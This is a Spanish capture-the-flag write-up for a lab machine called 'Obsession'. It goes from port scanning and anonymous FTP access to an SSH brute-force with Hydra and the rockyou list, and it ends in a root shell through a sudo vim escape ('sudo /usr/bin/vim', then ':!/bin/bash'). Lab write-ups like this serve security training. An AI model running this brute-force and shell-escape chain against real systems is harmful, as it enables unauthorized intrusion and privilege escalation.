> For the complete documentation index, see [llms.txt](https://shinki-organization.gitbook.io/dw/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://shinki-organization.gitbook.io/dw/write-ups/quickstart/maquinas-muy-faciles/obsession-write-up.md).

# Obsession write-up

## **Verificamos si tenemos conexión con la máquina víctima**

<figure><img src="/files/xXKHM1QXvsZusbPOFc97" alt=""><figcaption></figcaption></figure>

## **Escaneo de puertos abiertos**

Ahora utilizamos la herramienta **Nmap** para escanear los puertos abiertos de la máquina víctima con el siguiente comando:

```bash
sudo nmap -p- -sCVS --min-rate=5000 -vvv -Pn -n 172.17.0.2
```

Este escaneo nos indica que el puerto 21 (FTP), el 22 (SSH) y el 80 (HTTP) están abiertos, además nos indica que el servicio FTP nos permite loguear de manera anónima.

<figure><img src="/files/h1rQ7vL2IszucRyQYeTh" alt=""><figcaption></figcaption></figure>

!\[\[Anexos/2.png]]

Así que ahora accedemos como `anonymous` sin poner contraseña y encontramos los siguientes 2 archivos:

<figure><img src="/files/FKp6VtaW0WFjlcJr0hsp" alt=""><figcaption></figcaption></figure>

Nos descargamos los dos archivos con `get` de la siguiente manera:

```bash
get chat-gonza.txt
get pendientes.txt
```

<figure><img src="/files/Ex8TckxVKQn5mZdreaIK" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/3mf2qmRnyMtlz39uju3P" alt=""><figcaption></figcaption></figure>

Hacemos un cat de los dos archivos descargados y nos encontramos tres posibles usuarios del servicio SSH `Gonza`, `Russoski` y `Nágore`.

<figure><img src="/files/yG15EK5gHNo9am3hTcvk" alt=""><figcaption></figcaption></figure>

## **Ataque de fuerza bruta con Hydra**

Así que ahora realizamos un ataque de fuerza bruta con la herramienta **Hydra** para intentar conseguir la contraseña del servicio SSH con el siguiente comando:

```bash
hydra -l gonza -P /home/shinki/Escritorio/rockyou.txt ssh://172.17.0.2

hydra -l russoski -P /home/shinki/Escritorio/rockyou.txt ssh://172.17.0.2  

hydra -l nagore -P /home/shinki/Escritorio/rockyou.txt ssh://172.17.0.2  
```

Y encontramos la contraseña del usuario `Russoski` que es `iloveme`

<figure><img src="/files/d57qZZ4oemMfqIf1eFWu" alt=""><figcaption></figcaption></figure>

## **Intrusión en la máquina víctima**

Una vez dentro de la máquina víctima ejecutamos el comando `sudo -l` que nos indica que el usuario `Russoski` puede ejecutar el binario vim como cualquier usuario sin contraseña.

<figure><img src="/files/0Mbo0cyE8nwuDOpa5YVe" alt=""><figcaption></figcaption></figure>

Por lo tanto, solo queda ejecutar `vim` de la siguiente manera:

```bash
sudo /usr/bin/vim
```

Y ya dentro de vim escribimos lo siguiente:

```bash
:!/bin/bash
```

<figure><img src="/files/5HrvrC7W0orPveqiKEm3" alt=""><figcaption></figcaption></figure>

Y ya hemos obtenido una shell con privilegios root.

<figure><img src="/files/BpHwCcpAhATQdzAoyrN8" alt=""><figcaption></figcaption></figure>
